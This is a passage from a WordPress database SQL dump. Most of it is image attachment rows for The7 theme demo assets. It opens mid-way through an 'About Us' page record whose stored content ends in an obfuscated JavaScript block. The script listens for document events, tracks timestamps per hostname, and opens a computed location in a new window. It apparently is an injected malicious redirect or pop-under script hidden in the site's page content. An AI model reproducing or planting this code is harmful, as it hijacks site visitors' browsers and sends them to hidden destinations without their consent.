Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','About Us','','publish','closed','closed','','about','','','2016-02-08 15:50:40','2016-02-08 15:50:40','',0,'https://the7.io/marketing-agency/?page_id=388',5,'page','',0),
(411,1,'2016-11-19 23:37:03','2016-11-19 23:37:03','','bg-blur','','inherit','open','closed','','bg-blur','','','2016-11-19 23:37:03','2016-11-19 23:37:03','',0,'https://gsw2023.com/wp-content/uploads/2016/11/bg-blur.jpg',0,'attachment','image/jpeg',0),
(413,1,'2016-11-19 23:51:22','2016-11-19 23:51:22','','a-002','','inherit','open','closed','','a-002','','','2016-11-19 23:51:22','2016-11-19 23:51:22','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/a-002.png',0,'attachment','image/png',0),
(416,1,'2016-11-20 00:19:36','2016-11-20 00:19:36','','art-4','','inherit','open','closed','','art-4','','','2016-11-20 00:19:36','2016-11-20 00:19:36','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-4.png',0,'attachment','image/png',0),
(428,1,'2016-11-20 10:05:58','2016-11-20 10:05:58','','d-creative-agency','','inherit','open','closed','','d-creative-agency','','','2016-11-20 10:05:58','2016-11-20 10:05:58','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-creative-agency.jpg',0,'attachment','image/jpeg',0),
(448,1,'2016-11-20 13:14:57','2016-11-20 13:14:57','','d-psy','','inherit','open','closed','','d-psy','','','2016-11-20 13:14:57','2016-11-20 13:14:57','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-psy.jpg',0,'attachment','image/jpeg',0),
(451,1,'2016-11-20 13:15:01','2016-11-20 13:15:01','','d-construction','','inherit','open','closed','','d-construction','','','2016-11-20 13:15:01','2016-11-20 13:15:01','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-construction.jpg',0,'attachment','image/jpeg',0),
(452,1,'2016-11-20 13:15:02','2016-11-20 13:15:02','','d-resto','','inherit','open','closed','','d-resto','','','2016-11-20 13:15:02','2016-11-20 13:15:02','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-resto.jpg',0,'attachment','image/jpeg',0),
(453,1,'2016-11-20 13:15:04','2016-11-20 13:15:04','','d-artist','','inherit','open','closed','','d-artist','','','2016-11-20 13:15:04','2016-11-20 13:15:04','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-artist.jpg',0,'attachment','image/jpeg',0),
(507,1,'2016-11-20 15:37:46','2016-11-20 15:37:46','','more','','inherit','open','closed','','more','','','2016-11-20 15:37:46','2016-11-20 15:37:46','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/more.jpg',0,'attachment','image/jpeg',0),
(510,1,'2016-11-20 15:49:19','2016-11-20 15:49:19','','d-product','','inherit','open','closed','','d-product','','','2016-11-20 15:49:19','2016-11-20 15:49:19','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-product.jpg',0,'attachment','image/jpeg',0),
(516,1,'2016-11-20 16:06:44','2016-11-20 16:06:44','','d-cv','','inherit','open','closed','','d-cv','','','2016-11-20 16:06:44','2016-11-20 16:06:44','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-cv.jpg',0,'attachment','image/jpeg',0),
(520,1,'2016-11-20 16:14:03','2016-11-20 16:14:03','','d-med','','inherit','open','closed','','d-med','','','2016-11-20 16:14:03','2016-11-20 16:14:03','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-med.jpg',0,'attachment','image/jpeg',0),
(526,1,'2016-11-20 16:21:24','2016-11-20 16:21:24','','d-hosting','','inherit','open','closed','','d-hosting','','','2016-11-20 16:21:24','2016-11-20 16:21:24','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-hosting.jpg',0,'attachment','image/jpeg',0),
(535,1,'2016-11-20 16:40:17','2016-11-20 16:40:17','','d-digital-agency','','inherit','open','closed','','d-digital-agency','','','2016-11-20 16:40:17','2016-11-20 16:40:17','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-digital-agency.jpg',0,'attachment','image/jpeg',0),
(545,1,'2016-11-20 16:59:12','2016-11-20 16:59:12','','d-photography','','inherit','open','closed','','d-photography','','','2016-11-20 16:59:12','2016-11-20 16:59:12','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-photography.jpg',0,'attachment','image/jpeg',0),
(560,1,'2016-11-20 17:16:56','2016-11-20 17:16:56','','b-business-demo','','inherit','open','closed','','b-business-demo','','','2016-11-20 17:16:56','2016-11-20 17:16:56','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/b-business-demo.jpg',0,'attachment','image/jpeg',0),
(562,1,'2016-11-20 17:18:58','2016-11-20 17:18:58','','d-woo-shop','','inherit','open','closed','','d-woo-shop','','','2016-11-20 17:18:58','2016-11-20 17:18:58','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-woo-shop.jpg',0,'attachment','image/jpeg',0),
(689,1,'2016-11-22 10:37:46','2016-11-22 10:37:46','','ic-int','','inherit','open','closed','','ic-int','','','2016-11-22 10:37:46','2016-11-22 10:37:46','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-int.png',0,'attachment','image/png',0),
(691,1,'2016-11-22 11:28:25','2016-11-22 11:28:25','','ic-feat','','inherit','open','closed','','ic-feat','','','2016-11-22 11:28:25','2016-11-22 11:28:25','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-feat.png',0,'attachment','image/png',0),
(695,1,'2016-11-22 12:51:20','2016-11-22 12:51:20','','ic-seven-demo','','inherit','open','closed','','ic-seven-demo','','','2016-11-22 12:51:20','2016-11-22 12:51:20','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-seven-demo.png',0,'attachment','image/png',0),
(700,1,'2016-11-22 13:17:39','2016-11-22 13:17:39','','i-op','','inherit','open','closed','','i-op','','','2016-11-22 13:17:39','2016-11-22 13:17:39','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-op.png',0,'attachment','image/png',0),
(706,1,'2016-11-22 14:10:48','2016-11-22 14:10:48','','i-testim','','inherit','open','closed','','i-testim','','','2016-11-22 14:10:48','2016-11-22 14:10:48','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-testim.png',0,'attachment','image/png',0),
(721,1,'2016-11-22 14:27:05','2016-11-22 14:27:05','','stars-rating-landing-79x14','','inherit','open','closed','','stars-rating-landing-79x14','','','2016-11-22 14:27:05','2016-11-22 14:27:05','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-landing-79x14-1.png',0,'attachment','image/png',0),
(730,1,'2016-11-22 14:49:12','2016-11-22 14:49:12','','com-ic','','inherit','open','closed','','com-ic','','','2016-11-22 14:49:12','2016-11-22 14:49:12','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/com-ic.png',0,'attachment','image/png',0),
(835,1,'2016-11-22 21:45:31','2016-11-22 21:45:31','','photo-showcase','','inherit','open','closed','','photo-showcase','','','2016-11-22 21:45:31','2016-11-22 21:45:31','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/photo-showcase.jpg',0,'attachment','image/jpeg',0),
(837,1,'2016-11-22 21:49:40','2016-11-22 21:49:40','','design-showcase','','inherit','open','closed','','design-showcase','','','2016-11-22 21:49:40','2016-11-22 21:49:40','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/design-showcase.jpg',0,'attachment','image/jpeg',0),
(841,1,'2016-11-22 22:09:22','2016-11-22 22:09:22','','window-showcase','','inherit','open','closed','','window-showcase','','','2016-11-22 22:09:22','2016-11-22 22:09:22','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/window-showcase.jpg',0,'attachment','image/jpeg',0),
(844,1,'2016-11-22 22:36:43','2016-11-22 22:36:43','','vr-showcase','','inherit','open','closed','','vr-showcase','','','2016-11-22 22:36:43','2016-11-22 22:36:43','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/vr-showcase.jpg',0,'attachment','image/jpeg',0),
(883,1,'2016-11-25 20:37:28','2016-11-25 20:37:28','','landing-headers','','inherit','open','closed','','landing-headers','','','2016-11-25 20:37:28','2016-11-25 20:37:28','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/landing-headers.png',0,'attachment','image/png',0),
(885,1,'2016-11-25 20:50:05','2016-11-25 20:50:05','','landing-el','','inherit','open','closed','','landing-el','','','2016-11-25 20:50:05','2016-11-25 20:50:05','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/landing-el.png',0,'attachment','image/png',0),
(888,1,'2016-11-25 20:54:18','2016-11-25 20:54:18','','landing-ecom','','inherit','open','closed','','landing-ecom','','','2016-11-25 20:54:18','2016-11-25 20:54:18','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/landing-ecom.png',0,'attachment','image/png',0),
(893,1,'2016-11-25 20:57:40','2016-11-25 20:57:40','','land-lan-trans','','inherit','open','closed','','land-lan-trans','','','2016-11-25 20:57:40','2016-11-25 20:57:40','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/land-lan-trans.png',0,'attachment','image/png',0),
(895,1,'2016-11-25 21:02:05','2016-11-25 21:02:05','','land-plug-inc','','inherit','open','closed','','land-plug-inc','','','2016-11-25 21:02:05','2016-11-25 21:02:05','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/land-plug-inc.png',0,'attachment','image/png',0),
(897,1,'2016-11-25 21:03:54','2016-11-25 21:03:54','','land-7-rev','','inherit','open','closed','','land-7-rev','','','2016-11-25 21:03:54','2016-11-25 21:03:54','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/land-7-rev.png',0,'attachment','image/png',0),
(901,1,'2016-11-25 21:24:05','2016-11-25 21:24:05','','landing-seo-google','','inherit','open','closed','','landing-seo-google','','','2016-11-25 21:24:05','2016-11-25 21:24:05','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/landing-seo-google.png',0,'attachment','image/png',0),
(903,1,'2016-11-25 21:29:28','2016-11-25 21:29:28','','land-reg-upd','','inherit','open','closed','','land-reg-upd','','','2016-11-25 21:29:28','2016-11-25 21:29:28','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/land-reg-upd.png',0,'attachment','image/png',0),
(905,1,'2016-11-25 21:40:27','2016-11-25 21:40:27','','landing-support','','inherit','open','closed','','landing-support','','','2016-11-25 21:40:27','2016-11-25 21:40:27','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/landing-support.png',0,'attachment','image/png',0),
(920,1,'2016-11-25 22:04:25','2016-11-25 22:04:25','','stars-rating','','inherit','open','closed','','stars-rating','','','2016-11-25 22:04:25','2016-11-25 22:04:25','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/stars-rating.png',0,'attachment','image/png',0),
(924,1,'2016-11-25 22:08:18','2016-11-25 22:08:18','','the7-rating-rev','','inherit','open','closed','','the7-rating-rev','','','2016-11-25 22:08:18','2016-11-25 22:08:18','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/the7-rating-rev.png',0,'attachment','image/png',0),
(969,1,'2016-11-25 23:50:44','2016-11-25 23:50:44','','steps-wiz-land','','inherit','open','closed','','steps-wiz-land','','','2016-11-25 23:50:44','2016-11-25 23:50:44','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/steps-wiz-land.png',0,'attachment','image/png',0),
(973,1,'2016-11-28 16:35:30','2016-11-28 16:35:30','','2-l-tiny','','inherit','open','closed','','2-l-tiny','','','2016-11-28 16:35:30','2016-11-28 16:35:30','',0,'https://gsw2023.com/wp-content/uploads/2016/11/2-l-tiny.png',0,'attachment','image/png',0),
(974,1,'2016-11-28 16:35:33','2016-11-28 16:35:33','','2-r-tiny','','inherit','open','closed','','2-r-tiny','','','2016-11-28 16:35:33','2016-11-28 16:35:33','',0,'https://gsw2023.com/wp-content/uploads/2016/11/2-r-tiny.png',0,'attachment','image/png',0),
(975,1,'2016-11-28 16:35:35','2016-11-28 16:35:35','','3-r-tiny','','inherit','open','closed','','3-r-tiny','','','2016-11-28 16:35:35','2016-11-28 16:35:35','',0,'https://gsw2023.com/wp-content/uploads/2016/11/3-r-tiny.png',0,'attachment','image/png',0),
(976,1,'2016-11-28 16:35:36','2016-11-28 16:35:36','','addons-hero-tiny','','inherit','open','closed','','addons-hero-tiny','','','2016-11-28 16:35:36','2016-11-28 16:35:36','',0,'https://gsw2023.com/wp-content/uploads/2016/11/addons-hero-tiny.png',0,'attachment','image/png',0),
(977,1,'2016-11-28 16:35:38','2016-11-28 16:35:38','','art-m-tiny','','inherit','open','closed','','art-m-tiny','','','2016-11-28 16:35:38','2016-11-28 16:35:38','',0,'https://gsw2023.com/wp-content/uploads/2016/11/art-m-tiny.png',0,'attachment','image/png',0),
(978,1,'2016-11-28 16:35:40','2016-11-28 16:35:40','','l-1-tiny','','inherit','open','closed','','l-1-tiny','','','2016-11-28 16:35:40','2016-11-28 16:35:40','',0,'https://gsw2023.com/wp-content/uploads/2016/11/l-1-tiny.png',0,'attachment','image/png',0),
(979,1,'2016-11-28 16:35:41','2016-11-28 16:35:41','','l-3-tiny','','inherit','open','closed','','l-3-tiny','','','2016-11-28 16:35:41','2016-11-28 16:35:41','',0,'https://gsw2023.com/wp-content/uploads/2016/11/l-3-tiny.png',0,'attachment','image/png',0),
(980,1,'2016-11-28 16:35:43','2016-11-28 16:35:43','','r-1-tiny','','inherit','open','closed','','r-1-tiny','','','2016-11-28 16:35:43','2016-11-28 16:35:43','',0,'https://gsw2023.com/wp-content/uploads/2016/11/r-1-tiny.png',0,'attachment','image/png',0),
(981,1,'2016-11-28 16:35:46','2016-11-28 16:35:46','','slider-logo-img-tiny','','inherit','open','closed','','slider-logo-img-tiny','','','2016-11-28 16:35:46','2016-11-28 16:35:46','',0,'https://gsw2023.com/wp-content/uploads/2016/11/slider-logo-img-tiny.png',0,'attachment','image/png',0),
(982,1,'2016-11-28 16:35:48','2016-11-28 16:35:48','','vc-hero-tiny','','inherit','open','closed','','vc-hero-tiny','','','2016-11-28 16:35:48','2016-11-28 16:35:48','',0,'https://gsw2023.com/wp-content/uploads/2016/11/vc-hero-tiny.png',0,'attachment','image/png',0),
(983,1,'2016-11-28 16:48:17','2016-11-28 16:48:17','','art-landing-addons-and-composer','','inherit','open','closed','','art-landing-addons-and-composer','','','2016-11-28 16:48:17','2016-11-28 16:48:17','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-landing-addons-and-composer.jpg',0,'attachment','image/jpeg',0),
(984,1,'2016-11-28 16:48:20','2016-11-28 16:48:20','','art-landing-wizard','','inherit','open','closed','','art-landing-wizard','','','2016-11-28 16:48:20','2016-11-28 16:48:20','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-landing-wizard.jpg',0,'attachment','image/jpeg',0),
(986,1,'2016-11-28 16:50:47','2016-11-28 16:50:47','','art-landing-main-demo-tiny','','inherit','open','closed','','art-landing-main-demo-tiny','','','2016-11-28 16:50:47','2016-11-28 16:50:47','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-landing-main-demo-tiny.png',0,'attachment','image/png',0),
(987,1,'2016-11-28 16:50:48','2016-11-28 16:50:48','','art-landing-steps-wizard-tiny','','inherit','open','closed','','art-landing-steps-wizard-tiny','','','2016-11-28 16:50:48','2016-11-28 16:50:48','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-landing-steps-wizard-tiny.png',0,'attachment','image/png',0),
(988,1,'2016-11-28 16:50:50','2016-11-28 16:50:50','','art-landing-theme-options-tiny','','inherit','open','closed','','art-landing-theme-options-tiny','','','2016-11-28 16:50:50','2016-11-28 16:50:50','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/art-landing-theme-options-tiny.png',0,'attachment','image/png',0),
(990,1,'2016-11-28 17:02:14','2016-11-28 17:02:14','','elements-art-tiny','','inherit','open','closed','','elements-art-tiny','','','2016-11-28 17:02:14','2016-11-28 17:02:14','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/elements-art-tiny.png',0,'attachment','image/png',0),
(991,1,'2016-11-28 17:02:15','2016-11-28 17:02:15','','headers-art-tiny','','inherit','open','closed','','headers-art-tiny','','','2016-11-28 17:02:15','2016-11-28 17:02:15','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/headers-art-tiny.png',0,'attachment','image/png',0),
(992,1,'2016-11-28 17:02:17','2016-11-28 17:02:17','','plugins-art-tiny','','inherit','open','closed','','plugins-art-tiny','','','2016-11-28 17:02:17','2016-11-28 17:02:17','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/plugins-art-tiny.png',0,'attachment','image/png',0),
(993,1,'2016-11-28 17:02:18','2016-11-28 17:02:18','','rating-art-tiny','','inherit','open','closed','','rating-art-tiny','','','2016-11-28 17:02:18','2016-11-28 17:02:18','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/rating-art-tiny.png',0,'attachment','image/png',0),
(994,1,'2016-11-28 17:02:19','2016-11-28 17:02:19','','seo-art-tiny','','inherit','open','closed','','seo-art-tiny','','','2016-11-28 17:02:19','2016-11-28 17:02:19','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/seo-art-tiny.png',0,'attachment','image/png',0),
(995,1,'2016-11-28 17:02:21','2016-11-28 17:02:21','','support-art-tiny','','inherit','open','closed','','support-art-tiny','','','2016-11-28 17:02:21','2016-11-28 17:02:21','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/support-art-tiny.png',0,'attachment','image/png',0),
(996,1,'2016-11-28 17:02:23','2016-11-28 17:02:23','','translation-art-tiny','','inherit','open','closed','','translation-art-tiny','','','2016-11-28 17:02:23','2016-11-28 17:02:23','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/translation-art-tiny.png',0,'attachment','image/png',0),
(997,1,'2016-11-28 17:02:24','2016-11-28 17:02:24','','updates-art-tiny','','inherit','open','closed','','updates-art-tiny','','','2016-11-28 17:02:24','2016-11-28 17:02:24','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/updates-art-tiny.png',0,'attachment','image/png',0),
(998,1,'2016-11-28 17:02:25','2016-11-28 17:02:25','','woo-art-tiny','','inherit','open','closed','','woo-art-tiny','','','2016-11-28 17:02:25','2016-11-28 17:02:25','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/woo-art-tiny.png',0,'attachment','image/png',0),
(1000,1,'2016-11-28 17:15:03','2016-11-28 17:15:03','','logo-floating-hd','','inherit','open','closed','','logo-floating-hd','','','2016-11-28 17:15:03','2016-11-28 17:15:03','',0,'https://gsw2023.com/wp-content/uploads/2016/11/logo-floating-hd.png',0,'attachment','image/png',0),
(1001,1,'2016-11-28 17:15:04','2016-11-28 17:15:04','','logo-floating','','inherit','open','closed','','logo-floating','','','2016-11-28 17:15:04','2016-11-28 17:15:04','',0,'https://gsw2023.com/wp-content/uploads/2016/11/logo-floating.png',0,'attachment','image/png',0),
(1002,1,'2016-11-28 17:21:09','2016-11-28 17:21:09','','i-options-tiny','','inherit','open','closed','','i-options-tiny','','','2016-11-28 17:21:09','2016-11-28 17:21:09','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-options-tiny.png',0,'attachment','image/png',0),
(1003,1,'2016-11-28 17:21:10','2016-11-28 17:21:10','','i-testimonials-tiny','','inherit','open','closed','','i-testimonials-tiny','','','2016-11-28 17:21:10','2016-11-28 17:21:10','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-testimonials-tiny.png',0,'attachment','image/png',0),
(1004,1,'2016-11-28 17:21:12','2016-11-28 17:21:12','','i-wizard-tiny','','inherit','open','closed','','i-wizard-tiny','','','2016-11-28 17:21:12','2016-11-28 17:21:12','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-wizard-tiny.png',0,'attachment','image/png',0),
(1005,1,'2016-11-28 17:21:13','2016-11-28 17:21:13','','ic-demos-tiny','','inherit','open','closed','','ic-demos-tiny','','','2016-11-28 17:21:13','2016-11-28 17:21:13','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-demos-tiny.png',0,'attachment','image/png',0),
(1006,1,'2016-11-28 17:21:14','2016-11-28 17:21:14','','ic-features-tiny','','inherit','open','closed','','ic-features-tiny','','','2016-11-28 17:21:14','2016-11-28 17:21:14','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-features-tiny.png',0,'attachment','image/png',0),
(1007,1,'2016-11-28 17:21:16','2016-11-28 17:21:16','','ic-integration-tiny','','inherit','open','closed','','ic-integration-tiny','','','2016-11-28 17:21:16','2016-11-28 17:21:16','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-integration-tiny.png',0,'attachment','image/png',0),
(1008,1,'2016-11-28 17:21:19','2016-11-28 17:21:19','','ic-seven-demo-tiny','','inherit','open','closed','','ic-seven-demo-tiny','','','2016-11-28 17:21:19','2016-11-28 17:21:19','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-seven-demo-tiny.png',0,'attachment','image/png',0),
(1010,1,'2016-11-28 17:26:25','2016-11-28 17:26:25','','comment-icon-tiny','','inherit','open','closed','','comment-icon-tiny','','','2016-11-28 17:26:25','2016-11-28 17:26:25','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/comment-icon-tiny.png',0,'attachment','image/png',0),
(1011,1,'2016-11-28 17:26:27','2016-11-28 17:26:27','','stars-rating-icon-tiny','','inherit','open','closed','','stars-rating-icon-tiny','','','2016-11-28 17:26:27','2016-11-28 17:26:27','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/stars-rating-icon-tiny.png',0,'attachment','image/png',0),
(1032,1,'2016-11-28 19:32:11','2016-11-28 19:32:11','','the7-ipad-hd1','','inherit','open','closed','','the7-ipad-hd1','','','2016-11-28 19:32:11','2016-11-28 19:32:11','',0,'https://gsw2023.com/wp-content/uploads/2016/11/the7-ipad-hd1.gif',0,'attachment','image/gif',0),
(1033,1,'2016-11-28 19:32:12','2016-11-28 19:32:12','','the7-iphone-hd1','','inherit','open','closed','','the7-iphone-hd1','','','2016-11-28 19:32:12','2016-11-28 19:32:12','',0,'https://gsw2023.com/wp-content/uploads/2016/11/the7-iphone-hd1.gif',0,'attachment','image/gif',0),
(1034,1,'2016-11-28 19:32:14','2016-11-28 19:32:14','','the7-new-fav-hd1','','inherit','open','closed','','the7-new-fav-hd1','','','2016-11-28 19:32:14','2016-11-28 19:32:14','',0,'https://gsw2023.com/wp-content/uploads/2016/11/the7-new-fav-hd1.gif',0,'attachment','image/gif',0),
(1035,1,'2016-11-28 19:32:15','2016-11-28 19:32:15','','the7-new-fav1','','inherit','open','closed','','the7-new-fav1','','','2016-11-28 19:32:15','2016-11-28 19:32:15','',0,'https://gsw2023.com/wp-content/uploads/2016/11/the7-new-fav1.gif',0,'attachment','image/gif',0),
(1036,1,'2016-11-28 19:32:16','2016-11-28 19:32:16','','the7-old-ipad1','','inherit','open','closed','','the7-old-ipad1','','','2016-11-28 19:32:16','2016-11-28 19:32:16','',0,'https://gsw2023.com/wp-content/uploads/2016/11/the7-old-ipad1.gif',0,'attachment','image/gif',0),
(1046,1,'2016-12-14 09:51:03','2016-12-14 09:51:03','','d-constr','','inherit','open','closed','','d-constr','','','2016-12-14 09:51:03','2016-12-14 09:51:03','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-constr.jpg',0,'attachment','image/jpeg',0),
(1051,1,'2016-12-14 16:44:30','2016-12-14 16:44:30','','d-under-constr-02','','inherit','open','closed','','d-under-constr-02','','','2016-12-14 16:44:30','2016-12-14 16:44:30','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-under-constr-02.jpg',0,'attachment','image/jpeg',0),
(1056,1,'2016-12-14 20:12:36','2016-12-14 20:12:36','','d-under-constr-nav','','inherit','open','closed','','d-under-constr-nav','','','2016-12-14 20:12:36','2016-12-14 20:12:36','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-under-constr-nav.jpg',0,'attachment','image/jpeg',0),
(1058,1,'2016-12-15 18:26:47','2016-12-15 18:26:47','','d-business-one-page','','inherit','open','closed','','d-business-one-page','','','2016-12-15 18:26:47','2016-12-15 18:26:47','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-business-one-page.jpg',0,'attachment','image/jpeg',0),
(1163,1,'2016-11-20 17:29:48','2016-11-20 17:29:48','','d-news','','inherit','open','closed','','d-news','','','2016-11-20 17:29:48','2016-11-20 17:29:48','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-news.jpg',0,'attachment','image/jpeg',0),
(1164,1,'2016-11-22 10:17:55','2016-11-22 10:17:55','','ic-demos','','inherit','open','closed','','ic-demos','','','2016-11-22 10:17:55','2016-11-22 10:17:55','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/ic-demos.png',0,'attachment','image/png',0),
(1165,1,'2016-11-22 13:17:37','2016-11-22 13:17:37','','i-w','','inherit','open','closed','','i-w','','','2016-11-22 13:17:37','2016-11-22 13:17:37','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/i-w.png',0,'attachment','image/png',0),
(1166,1,'2017-01-16 17:47:19','2017-01-16 17:47:19','','bg-blur.jpg','','inherit','closed','closed','','bg-blur-jpg','','','2017-01-16 17:47:19','2017-01-16 17:47:19','',0,'https://gsw2023.com/wp-content/uploads/2017/01/bg-blur.jpg',0,'attachment','image/jpeg',0),
(1167,1,'2017-01-16 17:47:20','2017-01-16 17:47:20','','3-r-tiny.png','','inherit','closed','closed','','3-r-tiny-png','','','2017-01-16 17:47:20','2017-01-16 17:47:20','',0,'https://gsw2023.com/wp-content/uploads/2017/01/3-r-tiny.png',0,'attachment','image/png',0),
(1168,1,'2017-01-16 17:47:20','2017-01-16 17:47:20','','l-3-tiny.png','','inherit','closed','closed','','l-3-tiny-png','','','2017-01-16 17:47:20','2017-01-16 17:47:20','',0,'https://gsw2023.com/wp-content/uploads/2017/01/l-3-tiny.png',0,'attachment','image/png',0),
(1169,1,'2017-01-16 17:47:21','2017-01-16 17:47:21','','2-l-tiny.png','','inherit','closed','closed','','2-l-tiny-png','','','2017-01-16 17:47:21','2017-01-16 17:47:21','',0,'https://gsw2023.com/wp-content/uploads/2017/01/2-l-tiny.png',0,'attachment','image/png',0),
(1170,1,'2017-01-16 17:47:21','2017-01-16 17:47:21','','2-r-tiny.png','','inherit','closed','closed','','2-r-tiny-png','','','2017-01-16 17:47:21','2017-01-16 17:47:21','',0,'https://gsw2023.com/wp-content/uploads/2017/01/2-r-tiny.png',0,'attachment','image/png',0),
(1171,1,'2017-01-16 17:47:22','2017-01-16 17:47:22','','l-1-tiny.png','','inherit','closed','closed','','l-1-tiny-png','','','2017-01-16 17:47:22','2017-01-16 17:47:22','',0,'https://gsw2023.com/wp-content/uploads/2017/01/l-1-tiny.png',0,'attachment','image/png',0),
(1172,1,'2017-01-16 17:47:22','2017-01-16 17:47:22','','r-1-tiny.png','','inherit','closed','closed','','r-1-tiny-png','','','2017-01-16 17:47:22','2017-01-16 17:47:22','',0,'https://gsw2023.com/wp-content/uploads/2017/01/r-1-tiny.png',0,'attachment','image/png',0),
(1173,1,'2017-01-16 17:47:24','2017-01-16 17:47:24','','art-m-tiny.png','','inherit','closed','closed','','art-m-tiny-png','','','2017-01-16 17:47:24','2017-01-16 17:47:24','',0,'https://gsw2023.com/wp-content/uploads/2017/01/art-m-tiny.png',0,'attachment','image/png',0),
(1174,1,'2017-01-16 17:47:24','2017-01-16 17:47:24','','vc-hero-tiny.png','','inherit','closed','closed','','vc-hero-tiny-png','','','2017-01-16 17:47:24','2017-01-16 17:47:24','',0,'https://gsw2023.com/wp-content/uploads/2017/01/vc-hero-tiny.png',0,'attachment','image/png',0),
(1175,1,'2017-01-16 17:47:24','2017-01-16 17:47:24','','addons-hero-tiny.png','','inherit','closed','closed','','addons-hero-tiny-png','','','2017-01-16 17:47:24','2017-01-16 17:47:24','',0,'https://gsw2023.com/wp-content/uploads/2017/01/addons-hero-tiny.png',0,'attachment','image/png',0),
